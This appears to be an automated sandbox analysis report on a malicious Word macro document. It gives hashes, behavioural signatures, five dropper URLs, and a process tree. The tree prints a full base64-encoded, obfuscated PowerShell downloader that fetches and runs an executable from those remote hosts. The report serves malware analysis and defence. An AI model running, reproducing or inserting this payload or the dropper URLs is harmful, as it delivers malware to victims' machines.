Analysis

  • max time kernel
    45s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7v200217
  • submitted
    15-03-2020 17:14

General

  • Target

    c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888.doc

  • Size

    210KB

  • MD5

    2176e4f4af4abb52c7ae77cc4a30bb2d

  • SHA1

    9dcaeb06fc0d3fd31b48875b271f48fd5450fb9e

  • SHA256

    c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888

  • SHA512

    ea5ddb9f97ba02a860917bb6095f62f1ac6587ba86ee3e99aadab75d962a147a608ff4b48c0a297ee0971a40225edb86876ed990f08ff0704dcb5f646f04bb0c

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://ahuratech.com/ei9u4vn/T_8z/

exe.dropper

http://mindigroup.com/wp-admin/T_tB/

exe.dropper

http://extraspace.uk.com/wp-admin/i_Gl/

exe.dropper

http://nuoviclienti.net/hanemdg/Es_wv/

exe.dropper

http://eniyionfirma.com/wp-admin/CI_xj/

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Blacklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c4902a7a5058fe9b65d47d59dc62e36f5049146e5f551c1d5622226649da9888.doc"
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    PID:1856
  • C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
    PoWeRsHelL -e JABiAG8ANABaAEQAQwBRAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHMANAAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAEMAeABVACcAKQApADsAJABvAEEAQQBVAEEARwBEAEEAIAA9ACAAJwA5ADEANgAnADsAJABvADQAQgBCAFUAVQA9ACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiAC0AZgAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGIARwBRACcALAAnADQAbwAnACkALAAnAGMAQwAnACwAJwBBACcAKQA7ACQAQgBBAGsAQQBVAEcAVQB3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAEEAQQBVAEEARwBEAEEAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAJwAuAGUAeAAnACwAJwBlACcAKQA7ACQASABBAGMAUQBBAEMAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAHcAVQBBACcALAAnAE4AQgB4ACcAKQA7ACQARQBrAEQAWgBHAEQAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAGAALgB3AEUAYABCAEMAbABpAGUAYABOAFQAOwAkAFoAWgAxAHcAQQBEAD0AKAAiAHsAMQAwAH0AewA2AH0AewAyADQAfQB7ADIAMQB9AHsANAA2AH0AewAxADYAfQB7ADIANgB9AHsAMQAzAH0AewA5AH0AewAyADMAfQB7ADEAOQB9AHsAMwA4AH0AewA0ADMAfQB7ADEANAB9AHsAMAB9AHsAOAB9AHsAMwAwAH0AewAzADMAfQB7ADQANAB9AHsANwB9AHsAMgAwAH0AewAyADkAfQB7ADIAMgB9AHsANAA4AH0AewAzADEAfQB7ADQAfQB7ADEAMQB9AHsAMQA3AH0AewAyADgAfQB7ADMANAB9AHsAMQA1AH0AewAzADUAfQB7ADQANwB9AHsANAAwAH0AewAyADUAfQB7ADIANwB9AHsAMwAyAH0AewAzADYAfQB7ADEAOAB9AHsAMQB9AHsAMQAyAH0AewAzADcAfQB7ADMAOQB9AHsAMwB9AHsANQB9AHsANAA1AH0AewA0ADIAfQB7ADQAMQB9AHsAMgB9ACIALQBmACcAZAAnACwAJwBAACcALAAnAC8AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQByAG0AJwAsACcAbgBmACcAKQAsACcAaQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBjAG8AJwAsACcAYQAuACcAKQAsACcAbQAnACkALAAnAGMAJwAsACcAdAAnACwAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBCACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBtAGkAJwAsACcAbgAvAFQAJwApACwAJwBfAHQAJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBpACcALAAnAG0AJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAaQBnAHIAJwAsACcAbgBkACcAKQApACwAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwB1ACcALAAnAHAAcwA6AC8AJwAsACcALwBhAGgAJwApACwAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALgAnACwAJwB0AGUAYwBoACcAKQAsACcAcgBhACcAKQAsACcAbgAvAGkAJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAdABwADoALwAvAGUAJwAsACcAaAAnACkALAAnAG4AJwAsACcAaQB5ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBwACcALAAnADoALwAvACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAGEAJwAsACcAdwBwAC0AJwApACwAJwBtAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAOgAvACcALAAnAHQAcAAnACkALAAnADkAdQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBAACcALAAnAF8ARwBsACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHYALwAnACwAJwBfAHcAJwApACwAJwBzACcAKQAsACcAdQAnACwAJwB0AHAAOgAnACwAJwBtAC8AJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBzAHAAJwAsACcAYQBjAGUAJwApACwAJwBvACcALAAnAG8AJwAsACcAYQAnACwAKAAiAHsAMgB9AHsAMwB9AHsAMAB9AHsAMQB9ACIALQBmACAAJwBUAF8AJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwB0AHQAJwAsACcALwBAAGgAJwAsACcAOAB6ACcAKQAsACcANAB2ACcALAAnAG4ALwAnACkALAAnAG4AJwAsACcAaAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcgBhACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGUAeAB0ACcALAAnAC8ALwAnACkAKQAsACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC0AJwAsACcAYQBkAG0AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBtAGQAZwAnACwAJwBlACcAKQAsACcAQAAnACwAJwB0ACcALAAnAC8AbgAnACwAJwAvAEUAJwAsACcAaQAnACwAJwBwAC4AJwAsACcAbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAbgBlAHQAJwAsACcALwBoACcAKQAsACcAXwB4AGoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGkAbgAnACwAJwAvAEMAJwApACwAJwBJACcAKQAsACcAYwBvACcALAAnAGgAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwAvAHcAcAAnACwAJwBtACcALAAnAC0AYQBkACcAKQAsACcAZQBpACcALAAoACIAewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAgAC0AZgAgACcAdgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBpAGUAbgB0AGkAJwAsACcAaQBjAGwAJwApACwAJwB1AG8AJwAsACcALgAnACkALAAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAJwB3AHAAJwAsACcALgB1AGsAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcALwAnACwAJwAuAGMAbwBtACcAKQApACkALgAiAHMAcABMAGAAaQB0ACIAKAAnAEAAJwApADsAJABzAEEAVQBDAF8AbwA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAYwBHACcALAAnAFUAJwApACwAJwBWAEIAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAcABfAFUAQgBBAEEAUQBVACAAaQBuACAAJABaAFoAMQB3AEEARAApAHsAdAByAHkAewAkAEUAawBEAFoARwBEAC4AIgBEAE8AVwBOAGwATwBhAGAAZABGAGAAaQBgAGwARQAiACgAJABwAF8AVQBCAEEAQQBRAFUALAAgACQAQgBBAGsAQQBVAEcAVQB3ACkAOwAkAEoAUQBRAFgAeABfAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIAIAAtAGYAJwBBAHcAJwAsACcAUQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG8AJwAsACcAUQBBADEAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQAQgBBAGsAQQBVAEcAVQB3ACkALgAiAGwAYABFAE4ARwB0AEgAIgAgAC0AZwBlACAAMgAxADUAOQA2ACkAIAB7ACYAKAAnAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEIAQQBrAEEAVQBHAFUAdwA7ACQASABBAF8ARwBBAFgAPQAoACIAewAyAH0AewAxAH0AewAwAH0AIgAgAC0AZgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQgBBACcALAAnAEQAQgAnACkALAAnAFEAJwAsACcAUAB3ACcAKQA7AGIAcgBlAGEAawA7ACQARwBjAHgAQgBEAEEAPQAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAQQAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEIAawBCACcALAAnAFgAdwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAaABCAEIAQQBaAFoAQQA9ACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcASgAnACwAJwBHAEIAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBEAEIAJwAsACcAdwBvACcAKQApAA==
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1968

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1856-1-0x0000000008A00000-0x0000000008A04000-memory.dmp

    Filesize

    16KB